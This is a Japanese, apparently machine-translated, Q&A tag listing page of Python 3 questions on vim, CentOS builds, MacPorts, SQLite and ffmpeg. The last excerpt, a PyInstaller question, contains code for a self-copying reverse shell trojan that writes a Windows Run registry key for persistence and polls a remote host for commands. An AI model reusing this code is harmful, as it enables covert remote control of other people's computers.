タグ付けされた質問 「python3」


8
Python 3をサポートするOSXにvimをインストールするにはどうすればよいですか?
私が行ったグーグル検索ではbrew install vim --with-python3、使用すべきコマンドはであり、エラーなしで成功しますが、vim --versionPython 3が利用不可として報告されます。 k162:~ asday$ brew install vim --with-python3 ==> Using the sandbox ==> Downloading https://github.com/vim/vim/archive/v7.4.2210.tar.gz Already downloaded: /Users/asday/Library/Caches/Homebrew/vim-7.4.2210.tar.gz ==> ./configure --prefix=/usr/local --mandir=/usr/local/Cellar/vim/7.4.2210/share/man --enable-multibyte --with-tlib=ncurses --enable-cscope --with-compiledby=Homebrew --enable-p ==> make ==> make install prefix=/usr/local/Cellar/vim/7.4.2210 STRIP=true 🍺 /usr/local/Cellar/vim/7.4.2210: 1,732 files, 28.5M, built in 52 seconds k162:~ asday$ vim …
20 macos  vim  python3 

2
Python 3.3.2をCentOS 5.9(x86_64)にインストールするときに、_decimalモジュールのコンパイルエラーを修正する方法
CentOS 5.9 x86_64でPython 3.3.2をコンパイルしようとすると、次のエラーが表示されます。 これらのモジュールのビルドに失敗しました: _decimal 「make」コマンド(./configureコマンドの後)を実行すると、このエラーが発生します。 Google検索を行っても、ほとんど情報が見つかりませんでした。この問題はgccの古いバージョンに関連しており、Linuxディストリビューションのバージョンをアップグレードすることで解決できるようです。しかし、私はCentOS 5.9に固執する必要があり、CentOS 5.9で利用可能なgccの最新バージョン(gccバージョン4.1.2)を既に使用しています。 誰かがPython 3.3.2をCentOS 5.9にインストールできましたか? ご協力ありがとうございました。

1
macポート経由でpythonを実行する
私は次のコマンドを使って、Macポート経由でpythonをインストールしました。 sudo port install python33 私はその後しました: sudo port select --set python python33 そして得た: Selecting 'python33' for 'python' succeeded. 'python33' is now active. しかし私がするとき which python 私は得ます: /Library/Frameworks/Python.framework/Versions/2.7/bin/python そして which python3 私は得ます: /Library/Frameworks/Python.framework/Versions/3.1/bin/python3 私は何をしましたか。 私がする時: port select --list python 私は得ます: Available versions for python: none python25-apple python33 (active) 私がする時 type -a …


0
Pythonに最新のSQLiteを使用させる方法
私はすでに次のことをしました: 1. Going over to this url: https://sqlite.org/download.html I will download 'sqlite-autoconf-3260000.tar.gz' which is version 3.26.0 2. assuming it's in my Downloads folder I will open my terminal and type in the following commands 3. I am assuming you have build-essentials installed if not run # sudo apt install build-essentials …

0
ffmpegはビデオファイルからオーディオを歪める
私は個人的な経験について話している個人からの250のビデオファイル(.mp4)を管理するためにffmpegを使用しています。視聴者が話者の話を聞きながら話の内容を理解できないように音声を歪める方法(誰かが音声のトーン)を知っている人はいますか? どこから始めればいいのかさえわかりません。事前にコードを提案しないで申し訳ありません。 ffmpegではなくPythonパッケージを使用しているのであれば、まったく問題ありません。 とにかくあなたの時間をどうもありがとう

0
--noconsoleオプションを使用したPyinstallerの「スクリプトの実行に失敗しました」エラー
私はPyinstallerのすべてのデバッグ手順を実行しましたが、ここでちょっとしたことをしているので、これに目を向けています。 いくつかの簡単なカスタムペンテストツールを作成してPython3に切り替えようとしています。現在、永続的なHTTPリバースシェルトロイの木馬を作成しています。完全なコードは次のとおりです。 import requests import subprocess import time import os import shutil import winreg path = os.getcwd().strip('\n') null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split(b'=') destination = str(userprof.decode().strip('\n\r')) + '\\Documents\\' + 'persistence.exe' if not os.path.exists(destination): shutil.copyfile(path + '\persistence.exe', str(destination)) key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",0,winreg.KEY_ALL_ACCESS) winreg.SetValueEx(key,'RegUpdater',0,winreg.REG_SZ,destination) key.Close() while True: req = requests.get('http://192.168.0.10') command = req.text if …
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.